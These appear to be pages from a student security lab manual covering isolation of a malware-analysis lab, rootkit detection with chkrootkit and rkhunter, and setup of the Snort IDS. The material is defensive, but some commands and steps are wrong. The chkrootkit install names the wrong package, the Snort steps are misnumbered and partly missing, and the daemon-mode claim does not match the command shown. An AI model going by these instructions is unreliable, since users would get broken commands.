4. Testing your Environment: Before starting with the analysis, you need to
make sure that everything is perfect and working fine. For this you need to check
the following things:
 Make sure no analysis machine has access to the Internet or your home/ work
network. You can control this with a Gateway. Try turning it ON and OFF so
that you can get familiar with the process.
 Turn all your machines ON and try running a network scan to see that
everything is working properly.
 It is very important to make sure that all your machines have a Snapshot in a
clear state. You should have clear rules and definitions stating how often you
will update them to install security patches, new software versions, and other
caveats.

50
 EXPERIMENT NO: 11

Aim: Investigate the functioning of a rootkit and demonstrate techniques to

detect it.

A rootkit is a malicious software that allows an unauthorized user to get access to a

system and to its restricted software. These rootkits may contain keyloggers,
credential stealers etc.

Most of the instructors focus on the hacking part rather than providing knowledge
on security. Rootkits with bad intentions can affect our system or privacy.

A rootkit is the combinations of two words — “root” and “kit” where root refers to
the administrative account with full privileges on the system whereas kit refers to
the code/program that allows the attacker to obtain unauthorized access.

In Kali Linux, we can install various open-source software to prevent our PCs from
rootkits. Therefore, “chkrootkit” and “rkhunter” are the two most famous open-
source software that anyone can install in their Linux system for the detection of
rootkits.

Chkrootkit

Chkrootkit (check rootkit) is a very old UNIX-based rootkit detection program

which provides users to check their system for rootkits.

51
To install chkrootkit into your system,
$ sudo apt-get install chkhunter

After installing any tool into your PC the best thing to do first is to check the help
section. User get to know various functionality with this,
$ chkrootkit -h

So, the simplest way of running chkrootkit is by typing,

$ chkrootkit

52
Therefore, the process begins and it will start checking the third party programs
(most specifically). This will provide the program scanned with their status.

So, those who are using kali linux , “chkrootkit” is pre-installed .

Rkhunter

Rkhunter (Rootkit Hunter) is a Linux/Unix based tool to scan possible rootkits,

backdoors and local exploits.

It does this by comparing SHA-1 hashes of important files with known good ones
in online databases, searching for default directories (of rootkits), wrong
permissions, hidden files, suspicious strings in kernel modules, and special tests for
Linux. (Wikipedia)

My personal favourite is the “rkhunter” because of its additional functionality and

also the other tools like chkrootkit is an old tool so there are many known exploits
for that.

To install rkhunter into Linux,

$ sudo apt-get install rkhunter

53
Now, by default typing rkhunter into the terminal will provide you with the number
of options you can go through,

54
So, the most common options to check the rootkits of the system is by using

 c or -C,
$ rkhunter -c

55
So, it will go through all the system files as well as third party programs in order to
look for the rootkits.

This will provide you with the summary of files scanned.

Finally, the result of the summary will be written into the log file →
/var/log/rkhunter.log

56
 EXPERIMENT NO: 12

Aim:.Set up a basic IDS like Snort and test its effectiveness in detecting
different types of attacks.
This will ensure that you have access to the latest version of Snort in the
repository.

Step 3: Install Snort using the following command:

sudo apt-get install snort

This command will download and install Snort on your system.

After Installing Snort, let's configure it.

Step 4: Once the installation is complete, you can check the version of
Snort installed on your system by running the following command:

snort -V
This will display the version information of Snort.

Step 5: By default, Snort will not start automatically when you boot up your
system.

You can enable Snort to start automatically on system boot by running the
following command:

sudo systemctl enable snort.service

This will enable Snort to start automatically every time you boot up your
system.

That's it! You now have Snort installed and enabled on your Linux system.

below steps will remain same for both of the methods.

Step 4: Create Snort User and Group

57
For security purposes, it is recommended to create a dedicated user and
group for Snort. Run the following commands to create a Snort user and
group:

sudo groupadd snort

sudo useradd snort -r -s /sbin/nologin -c SNORT_IDS -g snort
Step 5: Create Directories for Snort

Create the necessary directories for Snort by running the following

commands:

sudo mkdir /etc/snort

sudo mkdir /etc/snort/rules
sudo mkdir /etc/snort/preproc_rules
sudo mkdir /usr/local/lib/snort_dynamicrules
sudo mkdir /etc/snort/so_rules
Step 6: Configure Snort

After installing Snort, the next step is to configure it. We need to copy the
configuration files from the Snort directory to the /etc/snort directory. To do
this, run the following command:

sudo cp *.conf* /etc/snort

This command will copy all configuration files with .conf extension to
the /etc/snort directory.

Now, we need to edit the snort.conf file located in the /etc/snort directory.
This file contains the configuration options for Snort. You can use any text
editor to edit this file.

The snort.conf file contains many options, and it can be overwhelming for
beginners. However, you only need to modify a few options to get started.
Here's an example configuration:

ipvar HOME_NET 192.168.1.0/24

ipvar EXTERNAL_NET any

var RULE_PATH /etc/snort/rules

var SO_RULE_PATH /etc/snort/so_rules
var PREPROC_RULE_PATH /etc/snort/preproc_rules
58
var WHITE_LIST_PATH /etc/snort/rules
var BLACK_LIST_PATH /etc/snort/rules

output unified2: filename snort

In the above configuration, we have defined

The HOME_NET as 192.168.1.0/24, which is the network we want to

protect.

The EXTERNAL_NET is set to any, which means any external network.

The RULE_PATH, SO_RULE_PATH,

and PREPROC_RULE_PATH variables specify the paths for the rule files.
By default, Snort looks for the rule files in these directories.

The WHITE_LIST_PATH and BLACK_LIST_PATH variables specify the

paths for the white and blacklists.

Finally, we have specified the output format as unified2 and the filename
as a snort. This will generate alerts in the unified2 format and store them
in the snort file.

You can modify these options according to your requirements. Once you
have edited the snort.conf file, save it and exit the editor.

Step 7: Test Snort Installation

Now, it's time to test our Snort installation to make sure it's working
properly. Run the following command to start Snort in test mode:

sudo snort -T -c /etc/snort/snort.conf

This command will test the configuration file and display any errors or
warnings. If everything is fine, it will display a message saying Snort
successfully validated the configuration!.

Step 8: Start Snort

59
After successfully testing Snort, we can start it in the background using the
following command:

sudo snort -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

This command will start Snort in daemon mode with the eth0 interface. You
can replace eth0 with your desired interface name.

Congratulations! You have successfully installed Snort on your Linux

system. You can now start monitoring your network traffic for any potential
security threats.

60